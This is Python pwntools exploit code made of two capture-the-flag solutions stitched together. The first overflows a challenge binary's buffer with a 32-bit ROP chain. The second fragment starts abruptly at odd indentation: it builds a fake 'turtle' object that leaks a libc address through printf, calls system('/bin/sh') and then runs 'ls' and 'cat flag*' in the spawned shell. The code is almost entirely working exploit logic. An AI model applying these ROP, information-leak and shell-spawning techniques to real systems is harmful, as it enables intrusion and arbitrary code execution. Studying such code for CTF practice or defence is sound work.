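def main():
    """Overflow the challenge binary's input buffer with a 32-bit ROP chain.

    The chain calls win_function1(), win_function2(0xBAAAAAAD) and
    flag(0xDEADBAAD) in sequence; pwntools' ROP helper resolves the call
    targets and the gadgets between them from the ELF's own symbols.  The
    overflow is a fixed-size run of filler up to the saved return address,
    so the offset below is specific to this binary's stack layout.

    Raises:
        ValueError: if the assembled payload contains a newline byte, which
            the target's line-oriented read would presumably stop at,
            truncating the chain.
    """
    elf_name = '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop'
    elf = ELF(elf_name)
    # Distance from the start of the overflowed buffer to the saved return
    # address: presumably 0x18 bytes up to the saved EBP plus 4 bytes for
    # EBP itself (32-bit frame) -- confirm in a debugger if the binary changes.
    offset_buf_to_eip = 0x18 + 4

    p = process(elf_name)

    rop_chain = ROP(elf)
    rop_chain.win_function1()
    rop_chain.win_function2(0xBAAAAAAD)
    rop_chain.flag(0xDEADBAAD)

    log.info(rop_chain.dump())

    payload = 'A' * offset_buf_to_eip
    payload += str(rop_chain)
    # Explicit check instead of `assert`: asserts vanish under `python -O`,
    # and a stray 0x0a byte inside a gadget or function address would
    # otherwise cut the chain short with no diagnostic.
    if '\n' in payload:
        raise ValueError('payload contains a newline; the ROP chain would be truncated')
    p.sendlineafter('input> ', payload)

    print(p.recv(4096))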
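    def exploit(self):
        """Two-stage attack: leak libc through printf, then call system("/bin/sh").

        Stage 1 replaces a "turtle" object (built by Attack.create_fake_turtle,
        defined elsewhere) with one whose ROP chain calls
        printf("%sEND", &GOT[setvbuf]) and then returns to main().  The
        bytes printed before "END" are setvbuf's resolved address, which
        fixes the libc base.  Stage 2 rebuilds the fake turtle with a chain
        taken from libc that calls system() on the "/bin/sh" string inside
        libc, then drops into an interactive shell.

        Relies on self.elf, self.libc, self.get_process() and
        self.get_turtle_address(), plus Attack.create_fake_turtle() and the
        pwntools `args` object, all defined outside this method.

        Raises:
            ValueError: if a payload contains a newline byte, which
                sendline()/the target's line-based read would truncate.
            RuntimeError: if the stage-1 leak is empty or over-long, or the
                derived libc base is not page-aligned -- both mean the leak
                or the libc offsets do not match the target.
        """
        elf = self.elf
        libc = self.libc
        # Extra symbols for this libc build.  'OneGadget' is recorded but not
        # used below; '/bin/sh' is the offset of the string literal inside
        # libc that stage 2 hands to system().
        libc.symbols['OneGadget'] = 0x41320
        libc.symbols['/bin/sh'] = 0x001633e8
        # Offset, inside the fake turtle, at which the data string is placed.
        base_data = 0x80

        #    (gdb) x/xg 0x00601560
        #    0x601560:       0x0000001500000064
        Turtle_say_sel_id = 0x0000001500000064

        with self.get_process(ld_linux=True) as self.p:

            # -- stage 1 ---------------------------------------------------------------

            ADDR_turtle = self.get_turtle_address()
            log.info('turtle : %s', hex(ADDR_turtle))
            # The trailing marker lets recvuntil() find the end of the leak.
            data = '%sEND'
            ADDR_data = ADDR_turtle + base_data

            rop_chain = ROP(elf)
            rop_chain.printf(ADDR_data, elf.got['setvbuf'])
            rop_chain.main()
            log.debug('ROP CHAIN: \n%s', rop_chain.dump())

            payload = Attack.create_fake_turtle(ADDR_turtle, rop_chain.chain(),
                                                data, Turtle_say_sel_id)
            # Explicit check instead of `assert` (stripped under -O): a 0x0a
            # byte in a gadget address would silently truncate the payload.
            if '\n' in payload:
                raise ValueError('stage-1 payload contains a newline')
            self.p.sendline(payload)

            if args.GDB:
                pause()

            leak = self.p.recvuntil('END', drop=True)
            # A %s leak of a 64-bit user-space pointer is at most 8 bytes
            # (typically 6, fewer if the address contains a NUL).  An empty
            # leak (e.g. the configured timeout expired) must not be turned
            # into a bogus libc base.
            if not leak or len(leak) > 8:
                raise RuntimeError('unexpected setvbuf leak: %r' % leak)
            ADDR_setvbuf = u64(leak.ljust(8, '\x00'))
            libc.address = ADDR_setvbuf - libc.symbols['setvbuf']
            # libc is mapped page-aligned; a misaligned base means the leak
            # or the symbol offsets belong to a different libc.
            if libc.address & 0xfff:
                raise RuntimeError('libc base %s is not page-aligned' % hex(libc.address))
            ADDR_bin_sh = libc.symbols['/bin/sh']
            log.info('setvbuf   : %s', hex(ADDR_setvbuf))
            log.info('libc      : %s', hex(libc.address))
            log.info('/bin/sh   : %s', hex(ADDR_bin_sh))

            # -- stage 2 ---------------------------------------------------------------

            if args.GDB:
                pause()

            ADDR_turtle1 = self.get_turtle_address()
            log.info('turtle2   : %s', hex(ADDR_turtle1))
            # A copy of "/bin/sh" is placed in the fake turtle, but the chain
            # below passes libc's own copy (ADDR_bin_sh); the in-object copy
            # is presumably a fallback and is not referenced by the chain.
            data = '/bin/sh\x00'
            ADDR_data = ADDR_turtle1 + base_data

            rop_chain2 = ROP(libc)
            rop_chain2.system(ADDR_bin_sh)
            log.debug('ROP CHAIN: \n%s', rop_chain2.dump())

            payload = Attack.create_fake_turtle(ADDR_turtle1,
                                                rop_chain2.chain(), data,
                                                Turtle_say_sel_id)
            if '\n' in payload:
                raise ValueError('stage-2 payload contains a newline')
            self.p.sendline(payload)

            # Queue a couple of commands for the spawned shell, then hand
            # the session to the operator.
            self.p.sendline('ls -laF')
            self.p.sendline('cat flag*')
            self.p.interactive()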